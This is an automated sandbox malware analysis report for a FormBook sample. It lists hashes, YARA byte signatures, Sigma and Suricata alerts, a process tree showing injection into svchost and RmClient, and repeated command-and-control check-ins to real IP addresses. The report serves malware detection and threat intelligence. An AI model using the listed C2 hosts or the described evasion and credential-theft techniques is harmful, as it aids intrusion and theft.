Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
w64HYOhfv1.exe

Overview

General Information

Sample name:w64HYOhfv1.exe
renamed because original name is a hash value
Original sample name:67910182eeeb3ac668faa832fbadfbe41f239b03da3e05a4ed36ea9a65da3d5c.exe
Analysis ID:1529888
MD5:ac184c685020ceff107e43cabba13b4f
SHA1:220f62ae6c76b24985cc3dbf558022fc8ca65c29
SHA256:67910182eeeb3ac668faa832fbadfbe41f239b03da3e05a4ed36ea9a65da3d5c
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • w64HYOhfv1.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\w64HYOhfv1.exe" MD5: AC184C685020CEFF107E43CABBA13B4F)
    • svchost.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\w64HYOhfv1.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ifhdPMDeORMlb.exe (PID: 5460 cmdline: "C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RmClient.exe (PID: 6336 cmdline: "C:\Windows\SysWOW64\RmClient.exe" MD5: CE765DCC7CDFDC1BFD94CCB772C75E41)
          • ifhdPMDeORMlb.exe (PID: 3732 cmdline: "C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2992 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2f133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.2660000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.2660000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e333:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.2660000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.2660000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\w64HYOhfv1.exe", CommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", ParentImage: C:\Users\user\Desktop\w64HYOhfv1.exe, ParentProcessId: 7080, ParentProcessName: w64HYOhfv1.exe, ProcessCommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", ProcessId: 6480, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\w64HYOhfv1.exe", CommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", ParentImage: C:\Users\user\Desktop\w64HYOhfv1.exe, ParentProcessId: 7080, ParentProcessName: w64HYOhfv1.exe, ProcessCommandLine: "C:\Users\user\Desktop\w64HYOhfv1.exe", ProcessId: 6480, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-09T14:19:08.616111+020020507451Malware Command and Control Activity Detected192.168.2.44935244.213.25.7080TCP
            2024-10-09T14:19:32.668658+020020507451Malware Command and Control Activity Detected192.168.2.449390206.119.82.13480TCP
            2024-10-09T14:19:46.872552+020020507451Malware Command and Control Activity Detected192.168.2.44947067.223.117.18980TCP
            2024-10-09T14:20:09.135196+020020507451Malware Command and Control Activity Detected192.168.2.4495933.33.130.19080TCP
            2024-10-09T14:20:23.842524+020020507451Malware Command and Control Activity Detected192.168.2.449635183.181.83.13180TCP
            2024-10-09T14:20:37.626584+020020507451Malware Command and Control Activity Detected192.168.2.44963938.47.232.19680TCP
            2024-10-09T14:20:51.716612+020020507451Malware Command and Control Activity Detected192.168.2.4496433.33.130.19080TCP
            2024-10-09T14:21:05.903310+020020507451Malware Command and Control Activity Detected192.168.2.449647154.212.219.280TCP
            2024-10-09T14:21:20.647744+020020507451Malware Command and Control Activity Detected192.168.2.449651133.130.35.9080TCP
            2024-10-09T14:21:34.967764+020020507451Malware Command and Control Activity Detected192.168.2.4496553.33.130.19080TCP
            2024-10-09T14:21:48.803534+020020507451Malware Command and Control Activity Detected192.168.2.449659172.191.244.6280TCP
            2024-10-09T14:22:02.484919+020020507451Malware Command and Control Activity Detected192.168.2.449663162.241.244.10680TCP
            2024-10-09T14:22:17.290027+020020507451Malware Command and Control Activity Detected192.168.2.449674199.59.243.22780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-09T14:19:08.616111+020028554651A Network Trojan was detected192.168.2.44935244.213.25.7080TCP
            2024-10-09T14:19:32.668658+020028554651A Network Trojan was detected192.168.2.449390206.119.82.13480TCP
            2024-10-09T14:19:46.872552+020028554651A Network Trojan was detected192.168.2.44947067.223.117.18980TCP
            2024-10-09T14:20:09.135196+020028554651A Network Trojan was detected192.168.2.4495933.33.130.19080TCP
            2024-10-09T14:20:23.842524+020028554651A Network Trojan was detected192.168.2.449635183.181.83.13180TCP
            2024-10-09T14:20:37.626584+020028554651A Network Trojan was detected192.168.2.44963938.47.232.19680TCP
            2024-10-09T14:20:51.716612+020028554651A Network Trojan was detected192.168.2.4496433.33.130.19080TCP
            2024-10-09T14:21:05.903310+020028554651A Network Trojan was detected192.168.2.449647154.212.219.280TCP
            2024-10-09T14:21:20.647744+020028554651A Network Trojan was detected192.168.2.449651133.130.35.9080TCP
            2024-10-09T14:21:34.967764+020028554651A Network Trojan was detected192.168.2.4496553.33.130.19080TCP
            2024-10-09T14:21:48.803534+020028554651A Network Trojan was detected192.168.2.449659172.191.244.6280TCP
            2024-10-09T14:22:02.484919+020028554651A Network Trojan was detected192.168.2.449663162.241.244.10680TCP
            2024-10-09T14:22:17.290027+020028554651A Network Trojan was detected192.168.2.449674199.59.243.22780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-09T14:19:24.979387+020028554641A Network Trojan was detected192.168.2.449355206.119.82.13480TCP
            2024-10-09T14:19:27.506452+020028554641A Network Trojan was detected192.168.2.449367206.119.82.13480TCP
            2024-10-09T14:19:30.121686+020028554641A Network Trojan was detected192.168.2.449377206.119.82.13480TCP
            2024-10-09T14:19:39.233538+020028554641A Network Trojan was detected192.168.2.44942367.223.117.18980TCP
            2024-10-09T14:19:41.768077+020028554641A Network Trojan was detected192.168.2.44943767.223.117.18980TCP
            2024-10-09T14:19:44.427932+020028554641A Network Trojan was detected192.168.2.44945467.223.117.18980TCP
            2024-10-09T14:20:00.557302+020028554641A Network Trojan was detected192.168.2.4495533.33.130.19080TCP
            2024-10-09T14:20:03.179954+020028554641A Network Trojan was detected192.168.2.4495633.33.130.19080TCP
            2024-10-09T14:20:05.647658+020028554641A Network Trojan was detected192.168.2.4495793.33.130.19080TCP
            2024-10-09T14:20:15.573819+020028554641A Network Trojan was detected192.168.2.449631183.181.83.13180TCP
            2024-10-09T14:20:18.095551+020028554641A Network Trojan was detected192.168.2.449633183.181.83.13180TCP
            2024-10-09T14:20:21.448100+020028554641A Network Trojan was detected192.168.2.449634183.181.83.13180TCP
            2024-10-09T14:20:29.999500+020028554641A Network Trojan was detected192.168.2.44963638.47.232.19680TCP
            2024-10-09T14:20:32.512036+020028554641A Network Trojan was detected192.168.2.44963738.47.232.19680TCP
            2024-10-09T14:20:35.247466+020028554641A Network Trojan was detected192.168.2.44963838.47.232.19680TCP
            2024-10-09T14:20:44.064387+020028554641A Network Trojan was detected192.168.2.4496403.33.130.19080TCP
            2024-10-09T14:20:45.667999+020028554641A Network Trojan was detected192.168.2.4496413.33.130.19080TCP
            2024-10-09T14:20:48.225838+020028554641A Network Trojan was detected192.168.2.4496423.33.130.19080TCP
            2024-10-09T14:20:58.129652+020028554641A Network Trojan was detected192.168.2.449644154.212.219.280TCP
            2024-10-09T14:21:00.661953+020028554641A Network Trojan was detected192.168.2.449645154.212.219.280TCP
            2024-10-09T14:21:03.232231+020028554641A Network Trojan was detected192.168.2.449646154.212.219.280TCP
            2024-10-09T14:21:13.023711+020028554641A Network Trojan was detected192.168.2.449648133.130.35.9080TCP
            2024-10-09T14:21:15.543693+020028554641A Network Trojan was detected192.168.2.449649133.130.35.9080TCP
            2024-10-09T14:21:18.271142+020028554641A Network Trojan was detected192.168.2.449650133.130.35.9080TCP
            2024-10-09T14:21:26.327783+020028554641A Network Trojan was detected192.168.2.4496523.33.130.19080TCP
            2024-10-09T14:21:29.874916+020028554641A Network Trojan was detected192.168.2.4496533.33.130.19080TCP
            2024-10-09T14:21:32.399266+020028554641A Network Trojan was detected192.168.2.4496543.33.130.19080TCP
            2024-10-09T14:21:40.994458+020028554641A Network Trojan was detected192.168.2.449656172.191.244.6280TCP
            2024-10-09T14:21:43.770543+020028554641A Network Trojan was detected192.168.2.449657172.191.244.6280TCP
            2024-10-09T14:21:46.255504+020028554641A Network Trojan was detected192.168.2.449658172.191.244.6280TCP
            2024-10-09T14:21:54.748602+020028554641A Network Trojan was detected192.168.2.449660162.241.244.10680TCP
            2024-10-09T14:21:57.326171+020028554641A Network Trojan was detected192.168.2.449661162.241.244.10680TCP
            2024-10-09T14:21:59.854513+020028554641A Network Trojan was detected192.168.2.449662162.241.244.10680TCP
            2024-10-09T14:22:09.654766+020028554641A Network Trojan was detected192.168.2.449671199.59.243.22780TCP
            2024-10-09T14:22:12.189283+020028554641A Network Trojan was detected192.168.2.449672199.59.243.22780TCP
            2024-10-09T14:22:14.726611+020028554641A Network Trojan was detected192.168.2.449673199.59.243.22780TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: w64HYOhfv1.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: w64HYOhfv1.exeReversingLabs: Detection: 55%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2660000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: w64HYOhfv1.exeJoe Sandbox ML: detected
            Source: w64HYOhfv1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000001.00000002.1963873677.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963858433.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129554800.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ifhdPMDeORMlb.exe, 00000003.00000000.1867261425.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp, ifhdPMDeORMlb.exe, 00000007.00000000.2033224305.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.1964073483.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1847224890.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844685675.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.000000000318E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1965904772.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1964009179.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.1964073483.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1847224890.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844685675.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000006.00000002.4130603764.000000000318E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4130603764.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1965904772.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.1964009179.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RmClient.exe, 00000006.00000002.4131092895.000000000361C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4129491056.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2262378691.000000003BD2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000006.00000002.4131092895.000000000361C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4129491056.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2262378691.000000003BD2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: RmClient.pdb source: svchost.exe, 00000001.00000002.1963873677.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963858433.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129554800.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0053C280 FindFirstFileW,FindNextFileW,FindClose,6_2_0053C280
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 4x nop then xor eax, eax6_2_00529A00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 4x nop then mov ebx, 00000004h6_2_00D104E1
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h8_2_00000247FBAEC4E1

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49355 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49352 -> 44.213.25.70:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49390 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49352 -> 44.213.25.70:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49454 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49390 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49437 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49367 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49470 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49470 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49553 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49377 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49593 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49593 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49631 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49637 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49640 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49634 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49643 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49645 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49636 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49638 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49643 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49644 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49650 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49646 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49659 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49659 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49661 -> 162.241.244.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49641 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49657 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49655 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49658 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49655 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49633 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49652 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49642 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49674 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49674 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49635 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49635 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49647 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49647 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49649 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49639 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49639 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49651 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49651 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49672 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49656 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49654 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49648 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49423 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49662 -> 162.241.244.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49673 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49653 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49671 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49660 -> 162.241.244.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49579 -> 3.33.130.190:80
